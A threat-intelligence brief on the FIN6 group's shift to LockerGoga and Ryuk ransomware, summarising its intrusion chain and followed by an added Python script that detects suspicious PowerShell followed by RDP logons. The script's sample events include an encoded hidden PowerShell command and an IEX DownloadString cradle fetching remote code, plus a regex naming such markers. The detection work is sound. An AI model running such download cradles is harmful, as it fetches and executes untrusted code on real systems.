
FIN6 Group Expands Attack Scope with Ransomware

The FIN6 cybercriminal group, which typically targets payment card details, has started attacking non-finance entities by using ransomware to extort compromised organisations. FIN6 targets internet-facing systems through phishing attacks or by exploiting misconfigurations or unpatched vulnerabilities. After gaining an initial foothold, the hackers leverage "living-off-the-land" techniques such as running PowerShell commands to install publicly available penetration testing tools, Cobalt Strike or Metasploit, to steal credentials. With the stolen credentials, the hackers move laterally within the organisation’s network, usually via Windows' Remote Desktop Protocol. Compromised nodes are then used as malware distribution servers to stage either the LockerGoga or the Ryuk ransomware. FIN6 is estimated to have extorted tens of millions of dollars since July 2018, in addition to stealing payment card details from point-of-sale environments. [1]
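The chain described above (suspicious PowerShell on a workstation, then an RDP logon from that workstation to another host) is what a defender would want to correlate in Windows event logs. The following is an added detection example, not code from the original brief or from Ensign; the event records, host names and time window are constructed for illustration.

```python
from datetime import datetime, timedelta
import re

# Constructed sample events (not from the original page): 4688 = process creation,
# 4624 = logon; logon type 10 = RemoteInteractive, i.e. an RDP session.
EVENTS = [
    {"time": "2019-04-01T10:00:00", "id": 4688, "host": "WS01", "user": "alice",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3..."},
    {"time": "2019-04-01T10:02:30", "id": 4688, "host": "WS01", "user": "alice",
     "cmdline": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"time": "2019-04-01T10:20:00", "id": 4624, "host": "SRV02", "user": "svc_backup",
     "logon_type": 10, "src_host": "WS01"},
    {"time": "2019-04-01T11:00:00", "id": 4688, "host": "WS09", "user": "bob",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"time": "2019-04-02T09:00:00", "id": 4624, "host": "SRV03", "user": "bob",
     "logon_type": 10, "src_host": "WS09"},
]

# Markers of the living-off-the-land PowerShell usage the brief describes:
# hidden windows, encoded commands and in-memory download cradles.
SUSPICIOUS_PS = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|\bIEX\b|Invoke-Expression|DownloadString",
    re.IGNORECASE,
)

def parse(ts):
    return datetime.fromisoformat(ts)

def find_chains(events, window=timedelta(hours=2)):
    """Return (src_host, dst_host, user) triples where a suspicious PowerShell
    execution on src_host is followed within `window` by an RDP logon from it."""
    suspicious = [e for e in events if e["id"] == 4688
                  and "powershell" in e["cmdline"].lower()
                  and SUSPICIOUS_PS.search(e["cmdline"])]
    hits = []
    for ps in suspicious:
        for e in events:
            if (e["id"] == 4624 and e.get("logon_type") == 10
                    and e.get("src_host") == ps["host"]
                    and timedelta(0) <= parse(e["time"]) - parse(ps["time"]) <= window):
                hit = (ps["host"], e["host"], e["user"])
                if hit not in hits:  # one alert per source/destination/account
                    hits.append(hit)
    return hits

if __name__ == "__main__":
    for src, dst, user in find_chains(EVENTS):
        print(f"possible PowerShell-then-RDP chain: {src} -> {dst} as {user}")
```

The benign `-File inventory.ps1` run on WS09 is followed by an RDP logon too, but does not match any living-off-the-land marker, so only the WS01 chain is reported.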

[1] Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware

Ensign InfoSecurity Singapore